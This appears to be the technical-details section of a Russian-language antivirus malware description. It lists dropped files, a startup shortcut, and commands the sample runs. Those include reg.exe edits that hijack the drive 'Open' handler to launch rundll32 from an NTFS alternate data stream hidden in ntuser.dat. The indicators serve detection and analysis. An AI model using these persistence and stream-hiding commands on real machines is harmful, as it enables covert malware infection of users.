Техническая информация
- %ALLUSERSPROFILE%\Start Menu\Programs\Startup\EventActivate.lnk (ярлык в общей для всех пользователей папке автозагрузки)
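- '<SYSTEM32>\reg.exe' add HKCU\Software\Classes\Drive\shell\Open\command /ve /f /d "<SYSTEM32>\rundll32.exe C:\Documents and Settings\%USERNAME%\ntuser.dat:init,CDLocateRng ""%1"""
  (команда записывает в значение по умолчанию ключа Drive\shell\Open\command запуск rundll32.exe с альтернативным потоком данных NTFS ntuser.dat:init, то есть переопределяет обработчик действия «Open» для дисков в профиле текущего пользователя)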
- '<SYSTEM32>\rundll32.exe' %ALLUSERSPROFILE%\Application Data\Microsoft\prov.cat,IlqUenn
- '<SYSTEM32>\reg.exe' add HKCU\Software\Classes\Drive\shell /ve /f /d "Open"
- '<SYSTEM32>\cmd.exe' /c init.cmd
- '<SYSTEM32>\cmd.exe' /c %TEMP%\vtrp.cmd
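- %HOMEPATH%\NTUSER.DAT:init (альтернативный поток данных NTFS с именем init у файла NTUSER.DAT; в обычном списке файлов каталога не отображается)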
- %TEMP%\vtrp.cmd
- %TEMP%\init
- %ALLUSERSPROFILE%\Application Data\Microsoft\prov.cat
- %ALLUSERSPROFILE%\Application Data\Microsoft\prov.cat
- %TEMP%\vtrp.cmd
- %TEMP%\init.cmd
- %HOMEPATH%\init
- из %TEMP%\init в %HOMEPATH%\init